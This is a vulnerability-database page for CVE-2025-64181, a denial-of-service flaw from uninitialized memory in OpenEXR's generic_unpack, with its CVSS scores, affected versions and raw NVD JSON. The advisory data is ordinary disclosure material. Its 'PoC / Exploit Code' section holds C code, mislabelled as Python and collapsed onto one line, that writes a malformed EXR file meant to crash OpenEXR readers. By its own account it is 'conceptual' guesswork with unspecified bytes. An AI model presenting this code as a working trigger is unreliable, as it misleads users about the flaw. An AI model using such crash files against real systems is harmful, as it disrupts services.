Security Vulnerability Report
中文
CVE-2025-64181 CVSS 7.5 HIGH

CVE-2025-64181

Published: 2025-11-10 22:15:37
Last Modified: 2025-12-08 15:59:59
Source: [email protected]

Description

OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.3.0 through 3.3.5 and 3.4.0 through 3.4.2, while fuzzing `openexr_exrcheck_fuzzer`, Valgrind reports a conditional branch depending on uninitialized data inside `generic_unpack`. This indicates a use of uninitialized memory. The issue can result in undefined behavior and/or a potential crash/denial of service. Versions 3.3.6 and 3.4.3 fix the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:* - VULNERABLE
OpenEXR 3.3.0 - 3.3.5
OpenEXR 3.4.0 - 3.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <stdlib.h> #include <string.h> // Minimal PoC for CVE-2025-64181: OpenEXR uninitialized memory in generic_unpack // This is a conceptual proof-of-concept showing the vulnerability trigger // Generate a malformed EXR file that triggers uninitialized memory usage void generate_malformed_exr(const char* filename) { FILE *fp = fopen(filename, "wb"); if (!fp) return; // EXR magic number unsigned char magic[4] = {0x76, 0x2f, 0x31, 0x01}; fwrite(magic, 1, 4, fp); // Version field - crafted to trigger parse path with uninitialized data unsigned char version[4] = {0x02, 0x00, 0x00, 0x00}; fwrite(version, 1, 4, fp); // Add malformed chunk data that triggers generic_unpack // The exact bytes depend on specific OpenEXR version unsigned char chunk_header[8] = {0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF}; fwrite(chunk_header, 1, 8, fp); // Incomplete/compressed data to trigger uninitialized memory read unsigned char payload[256]; memset(payload, 0x41, 256); fwrite(payload, 1, 256, fp); fclose(fp); } int main(int argc, char* argv[]) { if (argc < 2) { printf("Usage: %s <output_exr_file>\n", argv[0]); return 1; } generate_malformed_exr(argv[1]); printf("Malformed EXR file generated: %s\n", argv[1]); return 0; } // To trigger: Compile and run, then open with exrcheck or any OpenEXR-using application // Expected result: Program crash or Valgrind uninitialized memory warning

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64181", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:36.933", "lastModified": "2025-12-08T15:59:58.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.3.0 through 3.3.5 and 3.4.0 through 3.4.2, while fuzzing `openexr_exrcheck_fuzzer`, Valgrind reports a conditional branch depending on uninitialized data inside `generic_unpack`. This indicates a use of uninitialized memory. The issue can result in undefined behavior and/or a potential crash/denial of service. Versions 3.3.6 and 3.4.3 fix the issue."}, {"lang": "es", "value": "OpenEXR proporciona la especificación y la implementación de referencia del formato de archivo EXR, un formato de almacenamiento de imágenes para la industria cinematográfica. En las versiones 3.3.0 a 3.3.5 y 3.4.0 a 3.4.2, al realizar fuzzing en 'openexr_exrcheck_fuzzer', Valgrind informa una bifurcación condicional que depende de datos no inicializados dentro de 'generic_unpack'. Esto indica un uso de memoria no inicializada. El problema puede resultar en un comportamiento indefinido y/o un posible crash/denegación de servicio. Las versiones 3.3.6 y 3.4.3 solucionan el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-457"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "A83D8F0B-0D0A-403E-8D2E-2FB455041B8A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.3", "matchCriteriaId": "78287128-E16E-431F-922F-1F0272327A0D"}]}]}], "references": [{"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-3h9h-qfvw-98hq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/user-attachments/files/23024726/archive0.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/user-attachments/files/23024736/archive1.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/user-attachments/files/23024740/archive2.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/user-attachments/files/23024744/archive3.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/user-attachments/files/23024746/archive4.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https:/ ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.